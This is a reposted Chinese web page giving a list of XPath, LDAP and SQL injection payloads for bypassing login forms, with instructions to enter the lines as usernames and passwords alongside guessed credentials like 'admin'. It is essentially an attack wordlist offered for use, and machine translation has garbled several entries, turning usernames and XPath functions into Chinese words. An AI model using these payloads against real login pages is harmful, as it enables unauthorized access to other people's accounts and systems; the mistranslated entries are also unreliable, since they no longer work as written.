此列表包括XPath、LDAP 和SQL 注入登录绕过的有效负载(按顺序)。
使用此列表的方法是使用前200 行作为您的用户名和密码。然后首先在用户名中输入完整列表,然后在密码中输入完整列表,然后输入密码(例如Pass1234)或已知的用户名(例如admin)。
行政人员
密码
1234
123456
根
工具
测试
客人
\’或\’1\’=\’1
\’ 或\’=\’
\’ 或1]%00
\’ 或/* 或\’
\’ 或\’a\’ 或\’
\’ 或1 或\’
\’ 或true() 或\’
\’或字符串长度(name(.))10 或\’
\’或包含(名称,\’adm\’)或\’
\’或包含(.\’adm\’) 或\’
\’或position()=2 或\’
“管理员”或“
管理员\’或\’1\’=\’2
*
*)(
*)(|(
密码)
*)(|(*
*))%00
行政人员)()
残疾人
管理员)(!((|
密码))
管理员))(|(|
1234
“-”
””
”
\’^\’
“*”
\’ 或者\’\’-\’
\’ 或者\’\’ \’
\’ 或者\’\’\’
\’ 或\’^\’
\’ 或者\’\’*\’
“-”
以上关于#SQL注入登录绕过源网的相关内容仅供大家参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92061.html